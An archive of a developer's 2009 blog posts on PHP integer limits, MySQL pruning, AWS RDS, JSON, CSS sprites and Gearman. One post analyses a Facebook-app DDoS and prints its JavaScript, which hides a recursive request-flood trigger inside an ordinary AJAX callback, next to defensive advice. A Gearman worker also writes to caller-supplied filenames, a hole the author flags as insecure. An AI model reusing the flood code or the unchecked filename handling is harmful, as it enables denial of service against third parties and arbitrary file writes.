Archive for the ‘code’ Category

PHP & 64-bit Integer Modulus (Almost)

Wednesday, October 28th, 2009

While at times PHP seems to be capable of 64-bit math, it’s important to understand what’s really going on. On a 32-bit build, PHP silently converts any integer that overflows 32 bits to a float. While this usually isn’t a problem, many of the operations you might perform on an int, such as modulus, choke when PHP attempts to convert the value back to a 32-bit integer internally.

This is actually the cause of the sprintf / printf issue I encountered before. The code below prints the maximum signed value for integers from 1 to 64 bits wide, along with the result of the built-in modulus operator “%” and of mod(), a function I wrote that doesn’t go all the way to 64 bits but gets us a lot closer using only the built-in data types. If you can install extensions, review and test the performance of BCMath or GMP, both of which can handle much larger values.

<?php
 
// Find out what our internal values are capable of
print "PHP_INT_MAX: " . PHP_INT_MAX . "\n";
print "PHP_INT_SIZE: " . PHP_INT_SIZE . " bytes (" . (PHP_INT_SIZE * 8) . " bits)\n";
 
// Generate an array of maximum signed values for 1 to 64 bit integers
$ints = array();
for($pwr = 0; $pwr < 64; $pwr++){ $ints[] = pow(2,$pwr) - 1; }
 
// Generate a table of values
print "bits\t%100\tmod()\t%s\n";
$bits = 0;
foreach($ints as $int){
	$bits++;
	printf("%d\t%s\t%s\t%s\n", $bits, $int%100, mod($int,100), $int);
}
 
// Float-based modulus: exact only while $val fits in a double's 53-bit mantissa
function mod($val, $mod){ return $val - floor($val/$mod) * $mod; }
?>

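This generates the following table. Notice the internal value for integers is capped at 2,147,483,647 and the modulus operation goes kaput beyond 32 bits. The function provided seems to hold up through 59 bits before returning 0 at 60, but look closely: it is exact only through 54 bits. 2^53 - 1 (9,007,199,254,740,991) is the last value in the table that a double can store exactly. At 55 bits, 2^54 - 1 is rounded to 2^54, so mod() reports 84 where the true remainder is 83, and the results drift further from there.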

PHP_INT_MAX: 2147483647
PHP_INT_SIZE: 4 bytes (32 bits)
bits	%100	mod()	%s
1	0	0	0
2	1	1	1
3	3	3	3
4	7	7	7
5	15	15	15
6	31	31	31
7	63	63	63
8	27	27	127
9	55	55	255
10	11	11	511
11	23	23	1023
12	47	47	2047
13	95	95	4095
14	91	91	8191
15	83	83	16383
16	67	67	32767
17	35	35	65535
18	71	71	131071
19	43	43	262143
20	87	87	524287
21	75	75	1048575
22	51	51	2097151
23	3	3	4194303
24	7	7	8388607
25	15	15	16777215
26	31	31	33554431
27	63	63	67108863
28	27	27	134217727
29	55	55	268435455
30	11	11	536870911
31	23	23	1073741823
32	47	47	2147483647
33	-1	95	4294967295
34	-1	91	8589934591
35	-1	83	17179869183
36	-1	67	34359738367
37	-1	35	68719476735
38	-1	71	137438953471
39	-1	43	274877906943
40	-1	87	549755813887
41	-1	75	1099511627775
42	-1	51	2199023255551
43	-1	3	4398046511103
44	-1	7	8796093022207
45	-1	15	17592186044415
46	-1	31	35184372088831
47	-1	63	70368744177663
48	-1	27	1.4073748835533E+14
49	-1	55	2.8147497671066E+14
50	-1	11	5.6294995342131E+14
51	-1	23	1.1258999068426E+15
52	-1	47	2.2517998136852E+15
53	-1	95	4.5035996273705E+15
54	-1	91	9.007199254741E+15
55	0	84	1.8014398509482E+16
56	0	68	3.6028797018964E+16
57	0	32	7.2057594037928E+16
58	0	64	1.4411518807586E+17
59	0	32	2.8823037615171E+17
60	0	0	5.7646075230342E+17
61	0	0	1.1529215046068E+18
62	0	0	2.3058430092137E+18
63	0	0	4.6116860184274E+18
64	0	0	9.2233720368548E+18
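For values past the 53-bit limit, one option that needs no extension is to keep the number as a decimal string and take the remainder digit by digit, the same way long division does. The sketch below is only an illustration: str_mod() is a hypothetical helper name, it handles non-negative values only, and it assumes the modulus is small enough that ten times the modulus still fits in a native integer.

```php
<?php
// Exact remainder of a non-negative decimal string, using integer math only.
// str_mod() is a hypothetical helper name, not a PHP built-in.
function str_mod(string $digits, int $mod): int
{
    if ($mod <= 0 || !ctype_digit($digits)) {
        throw new InvalidArgumentException('expected a digit string and a positive modulus');
    }
    $remainder = 0;
    foreach (str_split($digits) as $digit) {
        // Same step as long division: bring down one digit, keep the remainder.
        $remainder = ($remainder * 10 + (int) $digit) % $mod;
    }
    return $remainder;
}

echo str_mod('4294967295', 100), "\n";          // 2^32 - 1, prints 95
echo str_mod('18014398509481983', 100), "\n";   // 2^54 - 1, prints 83
echo str_mod('9223372036854775807', 100), "\n"; // 2^63 - 1, prints 7
```

The trade-off is that the values have to travel as strings from end to end; once one has passed through a float, the low digits are already gone.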

MySQL Relational Database Service on AWS

Tuesday, October 27th, 2009

The stable of services available through AWS continues to expand! Last night Amazon announced RDS (Relational Database Service), which looks a lot like EC2 instances running MySQL with EBS volumes, something I have a fair bit of experience with. However, these have the added benefit of being a service that can scale memory and processor both up and down with a single service call.

# rds-modify-db-instance mydbinstance --db-instance-class db.m1.xlarge -s 100

This flexibility comes with a downside, namely a 4 hour monthly service window where patches, updates and those requested capacity changes are applied. You can choose to apply them immediately, but your application should be prepared to handle the downtime. What happens is, your database instance goes offline and when it comes back, it has all the changes you requested applied. So at best, you should expect uptime in the 99.4% range (4 hours out of a roughly 720 hour month). Most applications can handle a 4 hour downtime if it’s planned for. Under more conventional MySQL builds, developers or system administrators mitigate these downtimes by first applying changes to slaves, promoting one slave to master and then finally applying the changes to the original master. This sort of safety net gives applications smaller downtime windows (at most a few minutes each), allowing for theoretical 99.999% uptime.
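The uptime figures above are simple ratios, and a few lines of PHP make them easy to re-run with your own numbers. This is a rough sketch: the function names are made up for the illustration, and the 30-day month and 365-day year are assumptions.

```php
<?php
// Uptime as a percentage of a period, given downtime in the same unit.
function uptime_percent(float $downtime, float $period): float
{
    return 100.0 * (1.0 - $downtime / $period);
}

// Downtime (same unit as $period) that a target uptime percentage allows.
function downtime_budget(float $target_percent, float $period): float
{
    return $period * (1.0 - $target_percent / 100.0);
}

$hours_per_month  = 30 * 24;         // assumption: a 30-day month
$minutes_per_year = 365 * 24 * 60;   // assumption: a 365-day year

printf("4 hour window per month: %.2f%% uptime\n", uptime_percent(4, $hours_per_month));
printf("99.999%% uptime allows %.2f minutes per year\n", downtime_budget(99.999, $minutes_per_year));
```

With these assumptions the monthly window works out to about 99.44%, and five nines leaves a little over five minutes of downtime for the whole year.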

Transitioning to RDS may not be without pain either. Importing your data is done through a mysqldump (or other flat-file export) and then playing that file back into your AWS instance. Depending on the size of your dataset, a full mysqldump and re-import may take days (no, I’m not exaggerating). Also note that while mysqldump runs, your original database will hold a read lock for consistency. With some DBs I manage, I’ve stopped using mysqldump entirely because the dumps took more than 4 hours to complete on a dedicated slave. With the myriad of snapshotting technologies available, it’s much easier to grab a binary copy of the DB every few hours. One last limitation is that replication isn’t an option. I suspect AWS will be working on this soon as part of an HA (High Availability) release option.

Despite the limitations, I’m excited about this offering. It offloads many of the maintenance and management tasks, which are usually the most tedious. I also hope that this means a higher IO disk subsystem may be coming to EBS soon.

Deleting Data From InnoDB

Saturday, October 24th, 2009

Problem: We are given a large MySQL database table that no longer fits in the system’s working memory. We need to prune it, since a significant portion of the data is no longer relevant to keep in this table. Our expectation is that ~75% of the data will remain in the table because of a uniform and random distribution of values in col1 and col2. How, then, do we go about pruning this table as efficiently as possible?

The table structure is as follows:

describe big_table;
+-----------+---------------------+------+-----+---------+----------------+
| Field     | Type                | Null | Key | Default | Extra          |
+-----------+---------------------+------+-----+---------+----------------+
| id        | bigint(20) unsigned | NO   | PRI | NULL    | auto_increment | 
| col1      | bigint(20) unsigned | NO   | MUL | NULL    |                | 
| col2      | bigint(20) unsigned | NO   | MUL | NULL    |                | 
| chardata  | varchar(35)         | YES  |     | NULL    |                | 
+-----------+---------------------+------+-----+---------+----------------+

Solution 1: Delete

We can simply run a query against the database that will delete all records that are irrelevant. The idea here is that we use a single query that’s easily readable to filter out the unwanted records. For this example we’ll assume we are sharding this data and want to keep all odd values for either col1 or col2 in this table. We can use MySQL’s MOD() function and check for even values and delete them. We expect this query to remove ~25% of our table.

DELETE FROM big_table WHERE MOD(col1,2) = 0 AND MOD(col2, 2) = 0;

Solution 2: Create -> Insert -> Rename -> Drop (CIRD)

Another solution is to create a new table identical to the original table then simply insert the records we want to keep into the new table. Once we have all the records we wish to keep, we simply rename the tables and then drop our original table. The difference in this query is to think about what we want to keep as opposed to what we want to get rid of. We expect this method to insert ~75% of the original table.

CREATE TABLE big_table_copy LIKE big_table;
INSERT INTO big_table_copy SELECT * FROM big_table WHERE MOD(col1, 2) = 1 OR MOD(col2, 2) = 1;
RENAME TABLE big_table TO big_table_old, big_table_copy TO big_table;
DROP TABLE big_table_old;
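The two solutions only leave the same table behind if the INSERT condition is the exact complement of the DELETE condition, and the ~25% / ~75% split depends on the values being uniformly distributed. The sketch below checks both claims on randomly generated pairs; the function names, the seed and the value range are assumptions made for the illustration, not part of the original test.

```php
<?php
// The two WHERE clauses from the post, restated as predicates.
// is_deleted() and is_kept() are hypothetical names used only for this check.
function is_deleted(int $col1, int $col2): bool
{
    return $col1 % 2 === 0 && $col2 % 2 === 0;   // Solution 1: DELETE ... AND ...
}

function is_kept(int $col1, int $col2): bool
{
    return $col1 % 2 === 1 || $col2 % 2 === 1;   // Solution 2: INSERT ... OR ...
}

mt_srand(42);            // fixed seed so repeated runs agree
$rows = 100000;
$deleted = 0;
$disagreements = 0;
for ($n = 0; $n < $rows; $n++) {
    $col1 = mt_rand(0, 999999);
    $col2 = mt_rand(0, 999999);
    if (is_deleted($col1, $col2)) {
        $deleted++;
    }
    // Every row must be claimed by exactly one of the two statements.
    if (is_deleted($col1, $col2) === is_kept($col1, $col2)) {
        $disagreements++;
    }
}
printf("deleted: %.1f%%, disagreements: %d\n", 100 * $deleted / $rows, $disagreements);
```

Since both columns are unsigned, the remainder is never negative, so "not even" and "MOD(...) = 1" mean the same thing here.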

So which is faster?

It turns out solution 2 is considerably faster. Solution 1 finished preparing our test table in just over 33 minutes. Solution 2 completed the inverse task in just over 5 1/2 minutes. The test data was 1.58 million rows of randomly generated data. The MySQL server was crippled with a 32 MB buffer pool to closely mimic our real-world workload, which would be heavily IO bound. The on-disk file was about 260 MB. Using CIRD is about 6x faster than a straight delete. This probably isn’t surprising, as it’s been reported for a long time that DELETE is ~10x slower than INSERT with InnoDB, but I wanted to validate these findings to determine if they still held true for newer versions (5.1.30) of MySQL.

Redirect Clients While Processing Continues

Friday, October 16th, 2009

Generally, if I need the browser to see a page while the request continues executing, I would use a queue system like Gearman or Amazon’s SQS. However, in some rare cases running the code in the template requested by the user is just as fast as communicating with a remote queue. For those instances, redirecting the client while processing finishes makes sense.

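<?php
// Redirect the client
ignore_user_abort(true);   // keep running after the browser disconnects
set_time_limit(1);         // raise this if the follow-up work needs more than 1 second of execution time
ob_start();
header("Location: http://www.example.com/");
header("Connection: close");
header("Content-Length: " . ob_get_length());   // the buffer is empty, so this sends 0
while(@ob_end_flush());    // flush and close every output buffer
flush();                   // push the headers to the client
 
// Continue processing
sleep(10);                 // stand-in for real work; on Unix, sleep() does not count toward the time limit
?>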

An example in action? Adding an entry to a database server on a redirect script. That DB server may be very busy and so take longer than we’d like to respond. Using this redirect code we can ensure the browser bounces to the next page as quickly as possible.

JSON Encoding and Decoding in PHP

Wednesday, September 23rd, 2009

JSON (JavaScript Object Notation) is a handy way to serialize data for passing through mediums that do not recognize complex data types, such as HTTP. While using it to pass data today I was bitten by a gotcha in how associative array data is encoded and decoded.

<?php 
$associative_array = array("key1"=>"value1","key2"=>"value2");
$regular_array = array("value1","value2");
$class_object = (object) array("key1"=>"value1","key2"=>"value2");
 
// The original data
print_r($associative_array);
print_r($regular_array);
print_r($class_object);
 
// Just encode the data
print "assoc: " . json_encode($associative_array) . "\n";
print "array: " . json_encode($regular_array) . "\n";
print "class: " . json_encode($class_object) . "\n";
 
// Encode and decode the data
print_r(json_decode(json_encode($associative_array)));
print_r(json_decode(json_encode($regular_array)));
print_r(json_decode(json_encode($class_object)));
?>

Notice when we run this, the first two print_r() calls correctly print an array and the third prints a stdClass Object. Now look at the three encoded lines. Notice how the associative array and the stdClass Object both produce the same JSON? Now look at the third set of print_r() calls. You can see the associative array data has been converted to a stdClass.

// The original data
Array
(
    [key1] => value1
    [key2] => value2
)
Array
(
    [0] => value1
    [1] => value2
)
stdClass Object
(
    [key1] => value1
    [key2] => value2
)
 
// Encoded for JSON
assoc: {"key1":"value1","key2":"value2"}
array: ["value1","value2"]
class: {"key1":"value1","key2":"value2"}
 
// Encoded and Decoded
stdClass Object
(
    [key1] => value1
    [key2] => value2
)
Array
(
    [0] => value1
    [1] => value2
)
stdClass Object
(
    [key1] => value1
    [key2] => value2
)

To avoid this behavior, simply cast the stdClass object to an array when you are decoding it. Cheers!

$json_data = '{"key1":"value1","key2":"value2"}';
$associative_array = (array) json_decode($json_data);
print_r($associative_array);
 
// Output
Array
(
    [key1] => value1
    [key2] => value2
)
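One caveat with the cast is that it only converts the outermost object. json_decode() also accepts a second argument; passing true decodes every JSON object as an associative array, nested ones included. A short comparison, using a made-up payload with one nested object:

```php
<?php
// Example payload invented for this comparison.
$json_data = '{"key1":"value1","nested":{"key2":"value2"}}';

// Casting converts only the outermost object; "nested" is still a stdClass.
$cast = (array) json_decode($json_data);
var_dump(is_array($cast), is_object($cast['nested']));

// Passing true as the second argument decodes every JSON object as an array.
$assoc = json_decode($json_data, true);
var_dump(is_array($assoc), is_array($assoc['nested']));
```

All four checks print bool(true). For flat data like the example in this post the two approaches give the same result.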

A DDoS Attack with Facebook’s Platform

Friday, July 17th, 2009

Some time ago I had the good fortune to work with some developers on a Facebook application that was underperforming. A thorough investigation of the application revealed that a large number of invalid requests were being passed to the server. It was the victim of a Distributed Denial of Service attack that used the Facebook platform and another, popular application to bring it down.

What Can a Developer Do?

  1. Before instantiating ANY code, check your signatures! There are a number of ways to do this, but for starters, check the $_REQUEST['fb_sig_app_id'] and be sure it’s yours!
  2. Spot check your log files for any large number of 404 requests to images or other files that are not valid. Google Analytics only reports on what’s working.
  3. Log invalid requests and errors. Keep the entire signature as it provides you the evidence needed to report the offending application.
  4. You may be able to make a legal case against the perpetrator of the attack if you have sufficient evidence. I am not a lawyer, but you can find one who specializes in technology crimes and talk to them.
  5. Contact Facebook. While DDoS is not explicitly prohibited in the Developer Terms of Service, it is illegal in many states, and compliance with state laws is explicitly stated as a requirement.

How Can I Keep My Server Running?

  1. Apply #1 above on all your pages. Don’t let the attacker make your machine work any harder than it has to. The second code listing below has a quick and dirty way to stop it in its tracks.
  2. Turn any abnormal 404 errors into logging pages so you can capture and log the requests. You can do this with .htaccess or a custom 404 page, whichever suits your particular situation.
  3. Save bandwidth however possible. If the attack is requesting valid image files, rename the real files and update your code, then pass very small bits of data back to the requesters of the old file names. Create 0 byte files to replace them using “touch file.png” so you minimize the outbound data.
  4. Change servers. Less than ideal, but contact your hosting company and move your app to a different IP and/or domain name ASAP.

How Did It Work?

The code from this attack is provided below and was obtained by viewing the source of the application. It essentially creates an endless loop of AJAX requests. The ajax.php file need only return JSON-encoded data including values for “cremate” and “cremate_threads” along with the expected payload; the ondone handler then calls cremate(), which begins the attack. Once invoked, the client keeps issuing requests up to its internal limits, consuming the resources of not only the target’s server but potentially the user’s browser as well.

function someValidAjaxCall(request_data) {
	var ajax = new Ajax();
	ajax.responseType = Ajax.JSON;
	ajax.useLocalProxy = false;
	ajax.ondone = function(data) {
		//
		// Do what the application should appear to do for the user
		//
 
		// Start the DDoS attack
		if (data.cremate && data.cremate_threads) {
			cremate(data.cremate, data.cremate_threads);
		}
	}
	ajax.post('http://255.255.255.255/ajax.php', request_data);
	return false;
}
 
function cremate(url, cremate_threads) {
	for (i=0; i<cremate_threads; i++) {
		sub_cremate(url + i);
	}
}
 
function sub_cremate(url) {
	ajax = new Ajax();
	ajax.responseType = Ajax.RAW;
	ajax.useLocalProxy = false;
	ajax.ondone = function(data) {
		sub_cremate(url);
	}
	ajax.onerror = function() {
		sub_cremate(url);
	}
	ajax.post(url);
}

The quick and dirty PHP check mentioned above:

// Will stop requests from other apps
if(!isset($_REQUEST['fb_sig_app_id']) || $_REQUEST['fb_sig_app_id'] != '1234567890'){ die('Error'); }
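Checking the app id alone only stops requests that do not bother to fake it. A fuller check verifies the signature itself. As I recall the platform documentation of the time, fb_sig was the MD5 of every fb_sig_ parameter (prefix stripped, sorted by name, joined as name=value with no separator) followed by the application secret. Treat that recipe as an assumption and confirm it against the platform documentation before relying on it; the function name and the secret below are placeholders.

```php
<?php
// Sketch of a signature check, ASSUMING the legacy scheme described above.
// fb_sig_is_valid() is a hypothetical helper, not part of any Facebook library.
function fb_sig_is_valid(array $request, string $secret): bool
{
    if (!isset($request['fb_sig']) || !is_string($request['fb_sig'])) {
        return false;
    }
    $params = [];
    foreach ($request as $key => $value) {
        // Collect only scalar fb_sig_* parameters, with the prefix removed.
        if (strpos((string) $key, 'fb_sig_') === 0 && is_scalar($value)) {
            $params[substr((string) $key, 7)] = (string) $value;
        }
    }
    ksort($params);
    $base = '';
    foreach ($params as $name => $value) {
        $base .= $name . '=' . $value;
    }
    // hash_equals() compares in constant time.
    return hash_equals(md5($base . $secret), $request['fb_sig']);
}

// Usage: reject the request before any other application code runs.
// if (!fb_sig_is_valid($_REQUEST, 'your-app-secret')) { die('Error'); }
```

Because the secret never leaves your server, another application cannot produce a matching signature just by copying your app id.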

Using CSS for Icons

Friday, July 17th, 2009

During an exploration of CloudFront it was noted that requests made up the lion’s share of the costs for one application. How much savings could be realized by merging all icon files into one and serving them using positioning in CSS? Quite a bit actually.

First, I created an icon file that is 128 pixels square to hold my 16 pixel square icons. Each of the icons individually averages out to ~700 bytes. After adding all the images, the total file size for this new icon file was ~21.5K. This already equates to a significant space savings on any page that loads all 64 icons, which individually would add up to ~44.8K. More space could be saved had I used a GIF, but I wanted to retain the alpha channel (personal preference). Next I created the necessary CSS to position these images, using intelligent names like s-icon-heart to replace images/heart.png, which makes the code very readable. The CSS positioning code for my icon file to support all 64 icons is ~3.6K, which needs to be added to the stylesheet sitewide.

Adding the icon file and the CSS together yields a total savings of ~19.7K for pages that use all icons in the file. While not every page uses every icon, stylesheets and images are usually cached by the browser, so future requests for these assets won’t incur a trip to the server. Furthermore we’ve eliminated up to 63 HTTP requests which, although individually quick, cumulatively add up to serious time for the browser!

You can see how I made my icon file by dropping the icons into a grid in Photoshop. I then save this out as a large PNG. Be aware that older versions of IE do not support PNG transparency so you might get some odd behaviors there. As always test in the browsers you wish to support.

Icon Screenshot

I then add the necessary positioning elements into my CSS file for each of the icons. Getting the names and positions was probably the most tedious part of the process.

div.icon { width:16px; height:16px; }
.icon { background-image: url('images/icons.png'); }
.icon-star-bronze-red { background-position: 0 0; }
.icon-star-bronze-green { background-position: -16px 0; }
.icon-star-bronze-blue { background-position: -32px 0; }
.icon-star-gold-red { background-position: -48px 0; }
.icon-star-gold-green { background-position: -64px 0; }
.icon-star-gold-blue { background-position: -80px 0; }
/* ... 58 more definitions */
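Since working out the positions by hand was the tedious part, a small script could generate the rules instead. This is a sketch, not what I actually used: sprite_css() and its parameters are hypothetical, and it assumes the icons sit in the sheet left to right, top to bottom, in the same order as the list of names.

```php
<?php
// Build background-position rules for a sprite laid out left to right, top to bottom.
// sprite_css() and its parameters are hypothetical names for this sketch.
function sprite_css(array $names, int $size = 16, int $columns = 8): string
{
    $css = '';
    foreach (array_values($names) as $index => $name) {
        $x = ($index % $columns) * $size;
        $y = intdiv($index, $columns) * $size;
        // Offsets are negative because the sheet shifts up and left behind the element.
        $css .= sprintf(
            ".icon-%s { background-position: %s %s; }\n",
            $name,
            $x === 0 ? '0' : "-{$x}px",
            $y === 0 ? '0' : "-{$y}px"
        );
    }
    return $css;
}

echo sprite_css(['star-bronze-red', 'star-bronze-green', 'star-bronze-blue']);
```

Run against the first three names, this prints the same three rules as the hand-written ones above; the ninth name in a longer list would wrap to the second row at 0 -16px.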

There are a number of ways to then use this in your code. You can point towards a clear.gif, if you’re already using one for positioning or layout. You can apply it as the background image on an element. Get creative.

<!-- using an image -->
<img src="images/clear.gif" width="16" height="16" class="icon icon-star-gold-red" />
<!-- using a div -->
<div class="icon icon-star-gold-red"></div>

If you are looking for a kick ass icon library, look no further than the FAMFAMFAM Silk Icons, which are available for free under a Creative Commons license.

Using newFetchPersonAppDataRequest on MySpace

Wednesday, July 15th, 2009

Storing application data on the OpenSocial host is a great way to offload some unnecessary database and application server load. Why request a preference such as a skin for a user profile from your servers if we can just let the container handle it? MySpace allows for ~1K of data storage per user per application. However, there is a bug with the method newFetchPersonAppDataRequest when it is added as the only item of a DataRequest. Calling send on the request doesn’t actually do anything! It returns a DataResponse object with no data. As a workaround, grab some other information to ensure that the request actually is sent to the container’s server. I used the owner data in this example.

// The function to load the application data
function getAppData(){
	var req = opensocial.newDataRequest();
	var owner = opensocial.newIdSpec({"userId":"OWNER"});
	req.add(req.newFetchPersonRequest(owner), "owner");
	req.add(req.newFetchPersonAppDataRequest(owner, "appdata"), "owner_appdata");
	req.send(getAppDataCallback);
	return;
}
 
// The callback for getAppData()
function getAppDataCallback(d){
	var owner = d.get("owner"); // if you need it, use it!
	var data = d.get("owner_appdata");
	if(data.hadError()){
		// handle the error appropriately
		return;
	}
	// do whatever your program needs to do with the data
}

Amazon AWS Command Line Tool Help

Monday, June 29th, 2009

Amazon’s Web Services are very handy, although sometimes the command line tool syntax is a little awkward to remember and the documentation, while extensive, is not quite as simple to navigate as I’d like. I’m providing these help files as a reference for anyone who might need them. As you are no doubt aware, you can also get this content directly by issuing <aws_command_name> --help in the shell. For me it’s much easier to have these up in a browser window so I can quickly toggle between it and the command line without losing my place. I’ve added references for Auto Scaling, CloudWatch, Elastic Compute Cloud and Elastic Load Balancing.

Getting up and Running with Gearman

Monday, April 27th, 2009

Gearman is a job scheduling service and I’m very excited about it. I’m using it in a development capacity so your mileage may vary in production, but I wanted to share my experience thus far. As I said, I’m very bullish on this project and I see it as hugely helpful in eliminating latency in applications that often get bogged down during unnecessary synchronous communications.

Compiling gearman required installing a package that wasn’t part of my default Fedora Core install and for me wasn’t intuitive to locate. The UUID header file was located in the package e2fsprogs-devel, which I found using yum provides "*/uuid.h". After that it was rather smooth to get it up and running. gearmand -d -u nobody got it running as a daemon and I was able to connect to it using telnet over port 4730. Next I compiled the source for the PHP client and got that hooked into PHP by adding an extension file include in /etc/php.d to load the module, then restarted Apache so it would be loaded there too.

Process to install and get running:

# First the server
tar -xzvf gearmand-0.5.tar.gz.tar
cd gearmand-0.5
yum install e2fsprogs-devel
./configure && make && make install
gearmand -d -u nobody
 
# Next the PHP client
tar -xzvf gearman-php-ext-0.2.tar.gz.tar
cd gearman-php-ext-0.2
phpize
./configure && make && make install
echo "extension=gearman.so" > /etc/php.d/gearman.ini
service httpd restart

So now to do some work, even if it’s useless, that takes a long time. It just so happens that creating a file with 1,000,000 sequential numbers takes a few seconds on a small EC2 instance, perfect for my test. I realize this is a highly insecure process: NEVER pass filenames as parameters in production code. Here’s the worker that creates a file (passed as the parameter) in the current system’s /tmp directory.

$worker = new gearman_worker();
$worker->add_server('127.0.0.1', 4730);
$worker->add_function('fill_file', 'fill_file_fn');
 
while(1) $worker->work();
 
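function fill_file_fn($job){
	$data = $job->workload();	// the file name sent by the client
	$fh = fopen("/tmp/" . $data, "w");
	if($fh === false){ return; }	// could not open the file, nothing to write
	for($i=1;$i<=1000000;$i++){	// 1 through 1,000,000 inclusive
		fwrite($fh, $i . "\n");
	}
	fclose($fh);
	return;
}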
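If a worker ever did have to accept a file name, the least it could do is refuse anything that is not a plain name. A minimal sketch of that check follows; safe_tmp_path() is a hypothetical helper, not part of the Gearman extension, and the allowed pattern (letters, digits, underscore, hyphen, .txt) is an assumption chosen to fit the test files used here.

```php
<?php
// Accept only plain names such as "file7.txt"; reject anything with path parts.
// safe_tmp_path() is a hypothetical helper, not part of the Gearman extension.
function safe_tmp_path(string $name, string $dir = '/tmp'): ?string
{
    // \A and \z anchor the whole string, so a trailing newline cannot sneak through.
    if (!preg_match('/\A[A-Za-z0-9_-]+\.txt\z/', $name)) {
        return null;
    }
    return $dir . '/' . $name;
}

var_dump(safe_tmp_path('file7.txt'));       // string(14) "/tmp/file7.txt"
var_dump(safe_tmp_path('../etc/passwd'));   // NULL
```

A worker would call this on the workload and return without writing when it gets null back.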

The calling client just invokes this 20 times in the background.

$client = new gearman_client();
$client->add_server('127.0.0.1', 4730);
for($i=0; $i<20; $i++){
	$client->do_background('fill_file', 'file' . $i . '.txt');
}

Workers are started from the command line with something like this, “php worker.php &” and if you want more, just run more of them. You can also kill off some if they’re no longer needed.

The client completes its run in about 5 seconds while 5 worker processes toil away in the background until they get their work done about 3 minutes later. The use cases from the gearman team show the utility of this as a spider and for image manipulation. I see uses for sending mass emails to distribution lists: use a template and substitute parameters to create a unique email for each person on the worker instead of the client, thus reducing the processing time to get the mail ready and speeding the delivery by using multiple workers for sending (they can even be on remote machines). This product is definitely worth checking out.

Hopefully this helps you get up and running with Gearman!

© 1998-2008 AF-Design, All rights reserved.